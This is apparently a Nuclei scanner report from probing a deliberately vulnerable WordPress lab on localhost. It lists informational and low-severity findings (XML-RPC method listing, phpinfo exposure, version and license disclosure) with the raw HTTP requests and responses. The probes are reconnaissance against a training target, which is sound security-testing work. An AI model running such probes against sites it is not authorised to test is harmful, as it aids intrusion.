!function(e,a,t){var r,n,o,i,p=a.createElement("canvas"),s=p.getContext&&p.getContext("2d");function c(e,t){var a=String.fromCharCode;s.clearRect(0,0,p.width,p.height),s.fillText(a.apply(this,e),0,0);var r=p.toDataURL();return s.clearRect(0,0,p.width,p.height),s.fillText(a.apply(this,t),0,0),r===p.toDataURL()}function l(e){if(!s||!s.fillText)return!1;switch(s.textBaseline="top",s.font="600 32px Arial",e){case"flag":return!c([127987,65039,8205,9895,65039],[127987,65039,8203,9895,65039])&&(!c([55356,56826,55356,56819],[55356,56826,8203,55356,56819])&&!c([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]));case"emoji":return!c([55357,56424,55356,57342,8205,55358,56605,8205,55357,56424,55356,57340],[55357,56424,55356,57342,8203,55358,56605,8203,55357,56424,55356,57340])}return!1}function d(e){var t=a.createElement("script");t.src=e,t.defer=t.type="text/javascript",a.getElementsByTagName("head")[0].appendChild(t)}for(i=Array("flag","emoji"),t.supports={everything:!0,everythingExceptFlag:!0},o=0;o<i.length;o++)t.supports[i[o]]=l(i[o]),t.supports.everything=t.supports.everything&&t.supports[i[o]],"flag"!==i[o]&&(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&t.supports[i[o]]);t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&!t.supports.flag,t.DOMReady=!1,t.readyCallback=function(){t.DOMReady=!0},t.supports.everything||(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(r=t.source||{}).concatemoji?d(r.concatemoji):r.wpemoji&&r.twemoji&&(d(r.twemoji),d(r.wpemoji)))}(window,document,window._wpemojiSettings);
</script>
<style>
img.wp-smiley,
img.emoji {
display: inline !important;
border: none !important;
box-shadow: none !important;
height: 1em !important;
width: 1em !important;
margin: 0 .07em !important;
vertical-align: -0.1em !important;
background: none !important;
padding: 0 !important;
}
</style>
<link rel='stylesheet' id='social-warfare-block-css-css' href='http://127.0.0.1:31337/wp-content/plugins/social-warfare/assets/js/post-editor/dist/blocks.style.build.css?ver=5.3' media='all' />
<link rel='stylesheet' id='wp-block-library-css' href='http://127.0.0.1:31337/wp-includes/css/dist/block-library/style.min.css?ver=5.3' media='all' />
<link rel='stylesheet' id='js-autocomplete-css' href='http://127.0.0.1:31337/wp-content/plugins/wp-advanced-search/class.inc/autocompletion/jquery.autocomplete.css?ver=1.0' media='all' />
<link rel='stylesheet' id='wordpress-file-upload-style-css' href='http://127.0.0.1:31337/wp-content/plugins/wp-file-upload/css/wordpre.... Truncated ....
Generated by Nuclei
[wordpress-xmlrpc-listmethods] [info] Wordpress XML-RPC List System Methods found on http://127.0.0.1:31337
Details: wordpress-xmlrpc-listmethods matched at http://127.0.0.1:31337
Protocol: HTTP
Full URL: http://127.0.0.1:31337/xmlrpc.php
Timestamp: Tue Jul 6 13:46:53 +0000 UTC 2021
Template Information
Key | Value |
---|---|
name | Wordpress XML-RPC List System Methods |
author | 0ut0fb4nd |
severity | info |
tags | wordpress |
Request
POST /xmlrpc.php HTTP/1.1
Host: 127.0.0.1:31337
User-Agent: Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36
Connection: close
Content-Length: 123
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
<?xml version="1.0" encoding="utf-8"?><methodCall><methodName>system.listMethods</methodName><params></params></methodCall>
Response
HTTP/1.1 200 OK
Connection: close
Content-Type: text/xml; charset=UTF-8
Date: Tue, 06 Jul 2021 13:46:52 GMT
Server: Apache/2.4.38 (Debian)
Set-Cookie: wp_wpfileupload_5b2dbabcbcf581dd4a9fba6cd728b7f5=xyMTggEmcAdBeqTLX8F96kwFzmhmFGty; expires=Thu, 08-Jul-2021 13:46:52 GMT; Max-Age=172800; path=/
Vary: Accept-Encoding
X-Powered-By: PHP/7.1.33
<?xml version="1.0" encoding="UTF-8"?>
<methodResponse>
<params>
<param>
<value>
<array><data>
<value><string>system.multicall</string></value>
<value><string>system.listMethods</string></value>
<value><string>system.getCapabilities</string></value>
<value><string>demo.addTwoNumbers</string></value>
<value><string>demo.sayHello</string></value>
<value><string>pingback.extensions.getPingbacks</string></value>
<value><string>pingback.ping</string></value>
<value><string>mt.publishPost</string></value>
<value><string>mt.getTrackbackPings</string></value>
<value><string>mt.supportedTextFilters</string></value>
<value><string>mt.supportedMethods</string></value>
<value><string>mt.setPostCategories</string></value>
<value><string>mt.getPostCategories</string></value>
<value><string>mt.getRecentPostTitles</string></value>
<value><string>mt.getCategoryList</string></value>
<value><string>metaWeblog.getUsersBlogs</string></value>
<value><string>metaWeblog.deletePost</string></value>
<value><string>metaWeblog.newMediaObject</string></value>
<value><string>metaWeblog.getCategories</string></value>
<value><string>metaWeblog.getRecentPosts</string></value>
<value><string>metaWeblog.getPost</string></value>
<value><string>metaWeblog.editPost</string></value>
<value><string>metaWeblog.newPost</string></value>
<value><string>blogger.deletePost</string></value>
<value><string>blogger.editPost</string></value>
<value><string>blogger.newPost</string></value>
<value><string>blogger.getRecentPosts</string></value>
<value><string>blogger.getPost</string></value>
<value><string>blogger.getUserInfo</string></value>
<value><string>blogger.getUsersBlogs</string></value>
<value><string>wp.restoreRevision</string></value>
<value><string>wp.getRevisions</string></value>
<value><string>wp.getPostTypes</string></value>
<value><string>wp.getPostType</string></value>
<value><string>wp.getPostFormats</string></value>
<value><string>wp.getMediaLibrary</string></value>
<value><string>wp.getMediaItem</string></value>
<value><string>wp.getCommentStatusList</string></value>
<value><string>wp.newComment</string></value>
<value><string>wp.editComment</string></value>
<value><string>wp.deleteComment</string></value>
<value><string>wp.getComments</string></value>
<value><string>wp.getComment</string></value>
<value><string>wp.setOptions</string></value>
<value><string>wp.getOptions</string></value>
<value><string>wp.getPageTemplates</string></value>
<value><string>wp.getPageStatusList</string></value>
<value><string>wp.getPostStatusList</string></value>
<value><string>wp.getCommentCount</string></value>
<value><string>wp.deleteFile</string></value>
<value><string>wp.uploadFile</string></value>
<value><string>wp.suggestCategories</string></value>
<value><string>wp.deleteCategory</string></value>
<value><string>wp.newCategory</string></value>
<value><string>wp.getTags</string></value>
<value><string>wp.getCategories</string></value>
<value><string>wp.getAuthors</string></value>
<value><string>wp.getPageList</string></value>
<value><string>wp.editPage</string></value>
<value><string>wp.deletePage</string></value>
<value><string>wp.newPage</string></value>
<value><string>wp.getPages</string></value>
<value><string>wp.getPage</string></value>
<value><string>wp.editProfile</string></value>
<value><string>wp.getProfile</string></value>
<value><string>wp.getUsers</string></value>
<value><string>wp.getUser</string></value>
<value><string>wp.getTaxonomies</string></value>
<value><string>wp.getTaxonomy</string></value>
<value><string>wp.getTerms</string></value>
<value><string>wp.getTerm</string></value>
<value><string>wp.deleteTerm</string></value>
<value><string>wp.editTerm</string></value>
<value><string>wp.newTerm</string></value>
<value><string>wp.getPosts</string></value>
<value><string>wp.getPost</string></value>
<value><string>wp.deletePost</string></value>
<value><string>wp.editPost</string></value>
<value><string>wp.newPost</string></value>
<value><string>wp.getUsersBlogs</string></value>
</data></array>
</value>
</param>
</params>
</methodResponse>
Generated by Nuclei
[addeventlistener-detect] [info] AddEventlistener detection found on http://127.0.0.1:31337
Details: addeventlistener-detect matched at http://127.0.0.1:31337
Protocol: HTTP
Full URL: http://127.0.0.1:31337
Timestamp: Thu Jul 8 00:10:41 +0000 UTC 2021
Template Information
Key | Value |
---|---|
name | AddEventlistener detection |
author | yavolo |
severity | info |
tags | xss |
Request
GET / HTTP/1.1
Host: 127.0.0.1:31337
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
Response
HTTP/1.1 200 OK
Connection: close
Content-Type: text/html; charset=UTF-8
Date: Thu, 08 Jul 2021 00:10:40 GMT
Link: <http://127.0.0.1:31337/index.php?rest_route=/>; rel="https://api.w.org/"
Server: Apache/2.4.38 (Debian)
Set-Cookie: wp_wpfileupload_5b2dbabcbcf581dd4a9fba6cd728b7f5=SD6AbHwPsXm3bM97yWTWzmcK7zETErFe; expires=Sat, 10-Jul-2021 00:10:40 GMT; Max-Age=172800; path=/
Vary: Accept-Encoding
X-Powered-By: PHP/7.1.33
<!DOCTYPE html>
<html class="no-js" lang="en-US">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0" >
<link rel="profile" href="https://gmpg.org/xfn/11">
<title>Damn Vulnerable WordPress – Just another WordPress site</title>
<!-- Social Warfare v3.5.2 https://warfareplugins.com --><style>@font-face {font-family: "sw-icon-font";src:url("http://127.0.0.1:31337/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.eot?ver=3.5.2");src:url("http://127.0.0.1:31337/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.eot?ver=3.5.2#iefix") format("embedded-opentype"),url("http://127.0.0.1:31337/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.woff?ver=3.5.2") format("woff"),
url("http://127.0.0.1:31337/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.ttf?ver=3.5.2") format("truetype"),url("http://127.0.0.1:31337/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.svg?ver=3.5.2#1445203416") format("svg");font-weight: normal;font-style: normal;}</style>
<!-- Social Warfare v3.5.2 https://warfareplugins.com -->
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="Damn Vulnerable WordPress » Feed" href="http://127.0.0.1:31337/?feed=rss2" />
<link rel="alternate" type="application/rss+xml" title="Damn Vulnerable WordPress » Comments Feed" href="http://127.0.0.1:31337/?feed=comments-rss2" />
<script>
window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/127.0.0.1:31337\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.3"}};
!function(e,a,t){var r,n,o,i,p=a.createElement("canvas"),s=p.getContext&&p.getContext("2d");function c(e,t){var a=String.fromCharCode;s.clearRect(0,0,p.width,p.height),s.fillText(a.apply(this,e),0,0);var r=p.toDataURL();return s.clearRect(0,0,p.width,p.height),s.fillText(a.apply(this,t),0,0),r===p.toDataURL()}function l(e){if(!s||!s.fillText)return!1;switch(s.textBaseline="top",s.font="600 32px Arial",e){case"flag":return!c([127987,65039,8205,9895,65039],[127987,65039,8203,9895,65039])&&(!c([55356,56826,55356,56819],[55356,56826,8203,55356,56819])&&!c([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]));case"emoji":return!c([55357,56424,55356,57342,8205,55358,56605,8205,55357,56424,55356,57340],[55357,56424,55356,57342,8203,55358,56605,8203,55357,56424,55356,57340])}return!1}function d(e){var t=a.createElement("script");t.src=e,t.defer=t.type="text/javascript",a.getElementsByTagName("head")[0].appendChild(t)}for(i=Array("flag","emoji"),t.supports={everything:!0,everythingExceptFlag:!0},o=0;o<i.length;o++)t.supports[i[o]]=l(i[o]),t.supports.everything=t.supports.everything&&t.supports[i[o]],"flag"!==i[o]&&(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&t.supports[i[o]]);t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&!t.supports.flag,t.DOMReady=!1,t.readyCallback=function(){t.DOMReady=!0},t.supports.everything||(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(r=t.source||{}).concatemoji?d(r.concatemoji):r.wpemoji&&r.twemoji&&(d(r.twemoji),d(r.wpemoji)))}(window,document,window._wpemojiSettings);
</script>
<style>
img.wp-smiley,
img.emoji {
display: inline !important;
border: none !important;
box-shadow: none !important;
height: 1em !important;
width: 1em !important;
margin: 0 .07em !important;
vertical-align: -0.1em !important;
background: none !important;
padding: 0 !important;
}
</style>
<link rel='stylesheet' id='social-warfare-block-css-css' href='http://127.0.0.1:31337/wp-content/plugins/social-warfare/assets/js/post-editor/dist/blocks.style.build.css?ver=5.3' media='all' />
<link rel='stylesheet' id='wp-block-library-css' href='http://127.0.0.1:31337/wp-includes/css/dist/block-library/style.min.css?ver=5.3' media='all' />
<link rel='stylesheet' id='js-autocomplete-css' href='http://127.0.0.1:31337/wp-content/plugins/wp-advanced-search/class.inc/autocompletion/jquery.autocomplete.css?ver=1.0' media='all' />
<link rel='stylesheet' id='wordpress-file-upload-style-css' href='http://127.0.0.1:31337/wp-content/plugins/wp-file-upload/css/wordpre.... Truncated ....
Reference:
Generated by Nuclei
[apache-version-detect] [info] Apache Version found on http://127.0.0.1:31337
Details: apache-version-detect matched at http://127.0.0.1:31337
Protocol: HTTP
Full URL: http://127.0.0.1:31337
Timestamp: Tue Jul 6 13:46:34 +0000 UTC 2021
Template Information
Key | Value |
---|---|
name | Apache Version |
author | philippedelteil |
description | Some Apache servers have the version on the response header. The OpenSSL version can be also obtained |
severity | info |
Request
GET / HTTP/1.1
Host: 127.0.0.1:31337
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
Response
HTTP/1.1 200 OK
Connection: close
Content-Type: text/html; charset=UTF-8
Date: Tue, 06 Jul 2021 13:46:32 GMT
Link: <http://127.0.0.1:31337/index.php?rest_route=/>; rel="https://api.w.org/"
Server: Apache/2.4.38 (Debian)
Set-Cookie: wp_wpfileupload_5b2dbabcbcf581dd4a9fba6cd728b7f5=DPzjPqab4zHrO94QLwf5dSaYOFSfFG5w; expires=Thu, 08-Jul-2021 13:46:33 GMT; Max-Age=172800; path=/
Vary: Accept-Encoding
X-Powered-By: PHP/7.1.33
<!DOCTYPE html>
<html class="no-js" lang="en-US">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0" >
<link rel="profile" href="https://gmpg.org/xfn/11">
<title>Damn Vulnerable WordPress – Just another WordPress site</title>
<!-- Social Warfare v3.5.2 https://warfareplugins.com --><style>@font-face {font-family: "sw-icon-font";src:url("http://127.0.0.1:31337/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.eot?ver=3.5.2");src:url("http://127.0.0.1:31337/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.eot?ver=3.5.2#iefix") format("embedded-opentype"),url("http://127.0.0.1:31337/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.woff?ver=3.5.2") format("woff"),
url("http://127.0.0.1:31337/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.ttf?ver=3.5.2") format("truetype"),url("http://127.0.0.1:31337/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.svg?ver=3.5.2#1445203416") format("svg");font-weight: normal;font-style: normal;}</style>
<!-- Social Warfare v3.5.2 https://warfareplugins.com -->
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="Damn Vulnerable WordPress » Feed" href="http://127.0.0.1:31337/?feed=rss2" />
<link rel="alternate" type="application/rss+xml" title="Damn Vulnerable WordPress » Comments Feed" href="http://127.0.0.1:31337/?feed=comments-rss2" />
<script>
window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/127.0.0.1:31337\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.3"}};
!function(e,a,t){var r,n,o,i,p=a.createElement("canvas"),s=p.getContext&&p.getContext("2d");function c(e,t){var a=String.fromCharCode;s.clearRect(0,0,p.width,p.height),s.fillText(a.apply(this,e),0,0);var r=p.toDataURL();return s.clearRect(0,0,p.width,p.height),s.fillText(a.apply(this,t),0,0),r===p.toDataURL()}function l(e){if(!s||!s.fillText)return!1;switch(s.textBaseline="top",s.font="600 32px Arial",e){case"flag":return!c([127987,65039,8205,9895,65039],[127987,65039,8203,9895,65039])&&(!c([55356,56826,55356,56819],[55356,56826,8203,55356,56819])&&!c([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]));case"emoji":return!c([55357,56424,55356,57342,8205,55358,56605,8205,55357,56424,55356,57340],[55357,56424,55356,57342,8203,55358,56605,8203,55357,56424,55356,57340])}return!1}function d(e){var t=a.createElement("script");t.src=e,t.defer=t.type="text/javascript",a.getElementsByTagName("head")[0].appendChild(t)}for(i=Array("flag","emoji"),t.supports={everything:!0,everythingExceptFlag:!0},o=0;o<i.length;o++)t.supports[i[o]]=l(i[o]),t.supports.everything=t.supports.everything&&t.supports[i[o]],"flag"!==i[o]&&(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&t.supports[i[o]]);t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&!t.supports.flag,t.DOMReady=!1,t.readyCallback=function(){t.DOMReady=!0},t.supports.everything||(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(r=t.source||{}).concatemoji?d(r.concatemoji):r.wpemoji&&r.twemoji&&(d(r.twemoji),d(r.wpemoji)))}(window,document,window._wpemojiSettings);
</script>
<style>
img.wp-smiley,
img.emoji {
display: inline !important;
border: none !important;
box-shadow: none !important;
height: 1em !important;
width: 1em !important;
margin: 0 .07em !important;
vertical-align: -0.1em !important;
background: none !important;
padding: 0 !important;
}
</style>
<link rel='stylesheet' id='social-warfare-block-css-css' href='http://127.0.0.1:31337/wp-content/plugins/social-warfare/assets/js/post-editor/dist/blocks.style.build.css?ver=5.3' media='all' />
<link rel='stylesheet' id='wp-block-library-css' href='http://127.0.0.1:31337/wp-includes/css/dist/block-library/style.min.css?ver=5.3' media='all' />
<link rel='stylesheet' id='js-autocomplete-css' href='http://127.0.0.1:31337/wp-content/plugins/wp-advanced-search/class.inc/autocompletion/jquery.autocomplete.css?ver=1.0' media='all' />
<link rel='stylesheet' id='wordpress-file-upload-style-css' href='http://127.0.0.1:31337/wp-content/plugins/wp-file-upload/css/wordpre.... Truncated ....
Extra Information
Extracted results:
- Apache/2.4.38 (Debian)
Generated by Nuclei
[phpinfo-files] [low] phpinfo Disclosure found on http://127.0.0.1:31337
Details: phpinfo-files matched at http://127.0.0.1:31337
Protocol: HTTP
Full URL: http://127.0.0.1:31337/info.php
Timestamp: Tue Jul 6 13:46:54 +0000 UTC 2021
Template Information
Key | Value |
---|---|
name | phpinfo Disclosure |
author | pdteam,daffainfo,meme-lord |
severity | low |
tags | config,exposure |
Request
GET /info.php HTTP/1.1
Host: 127.0.0.1:31337
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
Response
HTTP/1.1 200 OK
Connection: close
Content-Type: text/html; charset=UTF-8
Date: Tue, 06 Jul 2021 13:46:54 GMT
Server: Apache/2.4.38 (Debian)
Vary: Accept-Encoding
X-Powered-By: PHP/7.1.33
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<style type="text/css">
body {background-color: #fff; color: #222; font-family: sans-serif;}
pre {margin: 0; font-family: monospace;}
a:link {color: #009; text-decoration: none; background-color: #fff;}
a:hover {text-decoration: underline;}
table {border-collapse: collapse; border: 0; width: 934px; box-shadow: 1px 2px 3px #ccc;}
.center {text-align: center;}
.center table {margin: 1em auto; text-align: left;}
.center th {text-align: center !important;}
td, th {border: 1px solid #666; font-size: 75%; vertical-align: baseline; padding: 4px 5px;}
h1 {font-size: 150%;}
h2 {font-size: 125%;}
.p {text-align: left;}
.e {background-color: #ccf; width: 300px; font-weight: bold;}
.h {background-color: #99c; font-weight: bold;}
.v {background-color: #ddd; max-width: 300px; overflow-x: auto; word-wrap: break-word;}
.v i {color: #999;}
img {float: right; border: 0;}
hr {width: 934px; background-color: #ccc; border: 0; height: 1px;}
</style>
<title>phpinfo()</title><meta name="ROBOTS" content="NOINDEX,NOFOLLOW,NOARCHIVE" /></head>
<body><div class="center">
<table>
<tr class="h"><td>
<a href="http://www.php.net/"><img border="0" src="data:image/png;base64,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.... Truncated ....
Extra Information
Extracted results:
- 7.1.33
Generated by Nuclei
[wp-license-file] [info] WordPress license file disclosure found on http://127.0.0.1:31337
Details: wp-license-file matched at http://127.0.0.1:31337
Protocol: HTTP
Full URL: http://127.0.0.1:31337/license.txt
Timestamp: Tue Jul 6 13:46:41 +0000 UTC 2021
Template Information
Key | Value |
---|---|
tags | wordpress |
name | WordPress license file disclosure |
author | yashgoti |
severity | info |
Request
GET /license.txt HTTP/1.1
Host: 127.0.0.1:31337
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
Response
HTTP/1.1 200 OK
Connection: close
Accept-Ranges: bytes
Content-Type: text/plain
Date: Tue, 06 Jul 2021 13:46:41 GMT
Etag: "4ddf-57e6b80ad6140-gzip"
Last-Modified: Tue, 01 Jan 2019 20:37:49 GMT
Server: Apache/2.4.38 (Debian)
Vary: Accept-Encoding
WordPress - Web publishing software
Copyright 2011-2019 by the contributors
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
This program incorporates work covered by the following copyright and
permission notices:
